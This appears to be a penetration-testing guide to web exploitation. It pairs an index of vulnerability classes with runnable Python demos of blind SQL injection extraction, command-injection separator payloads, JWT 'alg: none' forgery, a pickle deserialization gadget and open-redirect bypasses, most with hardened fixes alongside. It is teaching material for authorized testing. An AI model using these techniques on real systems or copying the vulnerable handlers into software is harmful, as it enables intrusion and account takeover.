Web Exploitation

This phase covers active exploitation of confirmed vulnerabilities to demonstrate impact and gain access to the target application or the systems behind it. Each vulnerability class has its own guide with detailed techniques, automation scripts, and practice labs.

Warning

Always ensure you have written authorization that covers the target and the techniques you intend to use before attempting any exploitation. Document every action taken for the final report.

Exploitation Guides

SQL Injection

Union-based, blind Boolean/time-based, error-based SQLi. WAF bypasses and database-specific payloads.

MySQL, PostgreSQL, MSSQL, Oracle
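As an added example (not code from the guides this page links to), the Boolean-blind extraction loop driven against a constructed SQLite database that stands in for the target. The `users` table, the `admin`/`s3cret` row and the `vulnerable_lookup` endpoint are assumptions for the demo. The same loop drives time-based blind injection: replace the Boolean oracle with one that times a conditional delay (SLEEP() on MySQL, pg_sleep() on PostgreSQL, WAITFOR DELAY on MSSQL).

```python
import sqlite3

# Constructed stand-in for the target's database (demo data, not a real app).
_db = sqlite3.connect(":memory:", check_same_thread=False)
_db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
_db.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
_db.commit()

REQUESTS = {"count": 0}  # how many oracle calls an extraction costs


def vulnerable_lookup(username: str) -> bool:
    """Hypothetical vulnerable endpoint: the parameter is concatenated into the
    query and the response reveals only whether a row matched (a Boolean
    oracle), never the data itself."""
    REQUESTS["count"] += 1
    query = f"SELECT id FROM users WHERE username = '{username}'"
    return _db.execute(query).fetchone() is not None


def oracle(condition: str) -> bool:
    """Ask the application a yes/no question by ANDing it onto a known-true row
    and commenting out the rest of the original query."""
    return vulnerable_lookup(f"admin' AND ({condition}) -- ")


def _binary_search(greater_than, lo: int, hi: int) -> int:
    """Smallest v in [lo, hi] for which greater_than(v) is false, i.e. the
    value itself when greater_than(v) means 'the secret is > v'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(subquery: str, max_len: int = 64) -> str:
    """Recover the result of `subquery` one character at a time: first its
    length, then each character by binary search over the printable range
    (about 7 requests per character instead of up to 95 guesses)."""
    length = _binary_search(lambda n: oracle(f"length(({subquery})) > {n}"), 0, max_len)
    out = ""
    for pos in range(1, length + 1):
        code = _binary_search(
            lambda c, p=pos: oracle(f"unicode(substr(({subquery}), {p}, 1)) > {c}"),
            32, 126)
        out += chr(code)
    return out


if __name__ == "__main__":
    print(extract_string("SELECT password FROM users WHERE username = 'admin'"))
    print("requests used:", REQUESTS["count"])
```

Against a real target, `vulnerable_lookup` becomes an HTTP request and the oracle becomes whatever differs between the true and false responses (status code, a string in the body, content length); `unicode()`/`substr()` become the target DBMS's equivalents (ASCII()/SUBSTRING() on MySQL and MSSQL, ascii()/substr() on PostgreSQL and Oracle).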

Cross-Site Scripting (XSS)

Reflected, stored, and DOM-based XSS. Filter bypasses, CSP evasion, and BeEF integration.

Reflected, Stored, DOM

Cross-Site Request Forgery

CSRF token bypass, SameSite cookie bypass, JSON CSRF, and PoC generation.

Token Bypass, SameSite, JSON

File Upload Attacks

Web shell uploads, extension bypasses, magic byte manipulation, and polyglot files.

PHP, JSP, ASP, Polyglot

Server-Side Request Forgery

Internal network scanning, cloud metadata exploitation, DNS rebinding, and protocol smuggling.

AWS, GCP, Azure

OS Command Injection

Command separators, blind injection, filter bypasses, and reverse shells for Linux/Windows.

Linux, Windows, Reverse Shell
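An added example, not code from the linked guide: a hypothetical "ping a host" handler in its vulnerable form (string interpolated into a /bin/sh command line) next to a hardened form (argument vector, no shell, allowlisted input), exercised with the common command separators. `echo` stands in for `ping -c 1` so it runs anywhere, and `$((6*7))` is a harmless marker whose evaluation to `42` proves the shell interpreted our input; the payloads are constructed for the demo. The blind-injection probe at the end shows the time-based check used when command output is not returned.

```python
import re
import subprocess
import time


def vulnerable_ping(host: str) -> str:
    """Hypothetical vulnerable handler: the parameter is interpolated into a
    command string handed to /bin/sh, so separators, pipes and command
    substitution are interpreted. `echo` stands in for `ping -c 1`."""
    return subprocess.run(f"echo {host}", shell=True,
                          capture_output=True, text=True).stdout


def hardened_ping(host: str) -> str:
    """Same feature with no shell in the loop: the input is one argv element,
    and an allowlist rejects anything that is not a plausible hostname."""
    if not re.fullmatch(r"[A-Za-z0-9.-]{1,253}", host):
        raise ValueError("invalid hostname")
    return subprocess.run(["echo", host], capture_output=True, text=True).stdout


# Constructed payloads: each makes the shell evaluate $((6*7)), so "42" in the
# output proves injection (a stand-in for `id` or a reverse shell one-liner).
PAYLOADS = {
    "semicolon": "x; echo $((6*7))",
    "and-list": "x && echo $((6*7))",
    "pipe": "x | echo $((6*7))",
    "subshell": "$(echo $((6*7)))",
    "backtick": "`echo $((6*7))`",
    "newline": "x\necho $((6*7))",
}


def injected(output: str) -> bool:
    """The marker only appears if the shell ran our arithmetic."""
    return "42" in output


def hardened_rejects(host: str) -> bool:
    try:
        hardened_ping(host)
        return False
    except ValueError:
        return True


def measure_delay(host: str) -> float:
    """Blind injection: when output is not reflected, inject a delay
    (`; sleep N`) and time the request instead."""
    start = time.monotonic()
    vulnerable_ping(host)
    return time.monotonic() - start


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:10} vulnerable={injected(vulnerable_ping(payload))} "
              f"hardened_rejects={hardened_rejects(payload)}")
    print("blind probe delay:", round(measure_delay("x; sleep 1"), 2), "s")
```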

XML External Entity (XXE)

File disclosure, SSRF via XXE, blind XXE with OOB exfiltration, and SVG/DOCX injection.

File Read, Blind OOB, SAML

Authentication Bypass

Default credentials, SQLi login bypass, JWT attacks, 2FA bypass, and OAuth/SAML attacks.

JWT, 2FA, OAuth, SAML
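An added example of one of the JWT attacks, not code from the linked guide: a token forged with `alg: none` is accepted by a verifier that takes the algorithm from the attacker-controlled header, and rejected by one that pins the algorithm server-side. The HS256 key and the claims are constructed for the demo; only the standard library is used. The same root cause (trusting the header's `alg`) is behind RS256-to-HS256 key confusion, where the server's public key is used as the HMAC secret.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

SECRET = b"constructed-demo-hmac-key"  # assumption: the server's HS256 key


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def issue_token(payload: dict) -> str:
    """What the server hands out: HS256 over header.payload."""
    signing_input = f"{encode_part({'alg': 'HS256', 'typ': 'JWT'})}.{encode_part(payload)}"
    sig = hmac.new(SECRET, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def forge_alg_none(payload: dict) -> str:
    """Attacker's token: header claims alg=none, signature segment left empty."""
    return f"{encode_part({'alg': 'none', 'typ': 'JWT'})}.{encode_part(payload)}."


def hs256_ok(header_b64: str, payload_b64: str, sig_b64: str) -> bool:
    expected = hmac.new(SECRET, f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def naive_verify(token: str) -> Optional[dict]:
    """The bug: the algorithm is read from the header the attacker wrote."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none":  # unsigned token accepted as-is
        return json.loads(b64url_decode(p))
    if alg == "HS256" and hs256_ok(h, p, s):
        return json.loads(b64url_decode(p))
    return None


def strict_verify(token: str) -> Optional[dict]:
    """Fix: the expected algorithm is fixed in server config; the header must
    match it, and the signature is always checked."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None
    if not hs256_ok(h, p, s):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    forged = forge_alg_none({"sub": "alice", "role": "admin"})
    print("forged token:", forged)
    print("naive verifier accepts:", naive_verify(forged))
    print("strict verifier accepts:", strict_verify(forged))
```

When testing a real target, also try the header variants `None`, `NONE` and `nOnE`, since some libraries compared the algorithm name case-sensitively against a blocklist.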

Server-Side Template Injection

Jinja2, Twig, Freemarker exploitation. Template detection, RCE payloads, and filter bypasses.

Jinja2, Twig, Freemarker

Path Traversal / LFI / RFI

Directory traversal, local/remote file inclusion, PHP wrappers, and log poisoning.

LFI, RFI, PHP Wrappers

Insecure Deserialization

Java (ysoserial), PHP (phpggc), Python (pickle), and .NET gadget chains, with exploitation walkthroughs for each.

Java, PHP, Python, .NET
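An added example for the Python case, not code from the linked guide: a minimal pickle gadget, the vulnerable `loads()` that runs it, a restricted unpickler that refuses globals outside an allowlist, and a static triage helper that lists the globals a stream would import without loading it. `subprocess.check_output(["echo", "pwned"])` is a harmless stand-in for `os.system("<reverse shell>")`; the payloads are constructed for the demo.

```python
import io
import pickle
import pickletools
import subprocess


class Exploit:
    """Gadget: on load, pickle calls the callable returned by __reduce__ with
    the given args. The callable here is a harmless stand-in for os.system."""

    def __reduce__(self):
        return (subprocess.check_output, (["echo", "pwned"],))


def build_payload() -> bytes:
    return pickle.dumps(Exploit())


def benign_payload() -> bytes:
    # Constructed benign input of the shape the application actually expects.
    return pickle.dumps({"user": "alice", "roles": ["viewer"]})


def vulnerable_load(data: bytes):
    """Endpoint that unpickles untrusted input: the gadget runs inside loads()."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist of globals the stream may reference. Anything else is refused
    before it is resolved, so the callable is never imported, let alone called."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def restricted_rejects(data: bytes) -> bool:
    try:
        restricted_load(data)
        return False
    except Exception:
        return True


def referenced_globals(data: bytes) -> list:
    """Static triage without loading: the (module, name) pairs a pickle would
    import, from GLOBAL opcodes (protocol <= 3) or STACK_GLOBAL preceded by
    two string pushes (protocol >= 4)."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return found


if __name__ == "__main__":
    payload = build_payload()
    print("globals referenced:", referenced_globals(payload))
    print("vulnerable loads() returned:", vulnerable_load(payload))
    print("restricted unpickler rejects it:", restricted_rejects(payload))
```

The allowlist approach is the stdlib's own recommendation for pickle and is only a mitigation: the right fix is to not unpickle untrusted data at all and use a data-only format (JSON) with schema validation instead.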

IDOR

Horizontal/vertical privilege escalation, GUID prediction, parameter tampering, and automation.

Horizontal, Vertical, Autorize

NoSQL Injection

MongoDB operator injection, authentication bypass, data extraction, and blind injection.

MongoDB, CouchDB, Redis

Open Redirect

URL validation bypasses, OAuth token theft, SSRF chains, and phishing enhancement.

OAuth, SSRF Chain, Phishing
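An added example of the URL validation bypasses, not code from the linked guide: two typical weak checks on a `redirect` parameter, the payloads that slip past them, and a validator that resolves the value against the site origin and compares the parsed scheme and host exactly. The origin `https://app.example.com/` and the payloads are constructed for the demo. Note the browser-versus-parser gap handled explicitly: browsers treat `/\evil.example` as `//evil.example`, Python's `urllib.parse` does not, so backslashes are rejected before parsing rather than trusted.

```python
from urllib.parse import urljoin, urlparse

SITE_ORIGIN = "https://app.example.com/"  # assumption: the application's origin
TRUSTED_HOSTS = {"app.example.com"}


def naive_is_relative(url: str) -> bool:
    """Weak check: 'starts with a slash, so it stays on our site'."""
    return url.startswith("/")


def naive_prefix_check(url: str) -> bool:
    """Weak check: string prefix instead of the parsed host."""
    return url.startswith("https://app.example.com")


def safe_redirect_target(url: str, default: str = "/") -> str:
    """Resolve the value against our origin, then compare scheme and host
    exactly; anything else falls back to `default`."""
    # Browsers fold backslashes into slashes and strip control characters;
    # urllib does not, so refuse them instead of parsing them differently.
    if "\\" in url or any(ord(c) < 0x21 for c in url):
        return default
    resolved = urljoin(SITE_ORIGIN, url)
    parts = urlparse(resolved)
    if parts.scheme != "https" or parts.hostname not in TRUSTED_HOSTS:
        return default
    return resolved


# Constructed bypass payloads: each passes at least one of the naive checks.
BYPASSES = {
    "protocol-relative": "//evil.example/",
    "backslash": "/\\evil.example/",
    "userinfo": "https://app.example.com@evil.example/",
    "suffix-domain": "https://app.example.com.evil.example/",
    "scheme": "javascript:alert(document.domain)",
}


def report() -> dict:
    """Which naive check each payload bypasses, and what the safe validator does."""
    return {
        name: {
            "naive_is_relative": naive_is_relative(u),
            "naive_prefix_check": naive_prefix_check(u),
            "safe_target": safe_redirect_target(u),
        }
        for name, u in BYPASSES.items()
    }


if __name__ == "__main__":
    for name, row in report().items():
        print(f"{name:18} {row}")
```

In an OAuth flow the same validator belongs on `redirect_uri`, compared against the registered value exactly (not by prefix or substring), since an accepted open redirect there leaks the authorization code or token to the attacker's host.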

Business Logic Vulnerabilities

Workflow bypass, race conditions, payment manipulation, and rate limiting bypass.

Workflow, Race Conditions, Payment Logic

Quick Reference

Exploitation Methodology

  1. Identify the vulnerability type - Confirm it exists with a benign probe and understand which input reaches which sink
  2. Research exploitation techniques - Use the detailed guides above for the attack vectors specific to that class and the target's stack
  3. Develop or customize payloads - Adapt payloads to the target's technology and to any WAF, filter, or encoding in the way
  4. Demonstrate impact - Show real-world consequences (data access, RCE, account takeover) with the least destructive proof that makes the point
  5. Document everything - Screenshot evidence, save the exact payloads, and note each step so the finding can be reproduced

Information

Documentation is Key: Screenshot every successful exploitation attempt, note the exact payload used, and document the impact clearly for the final report.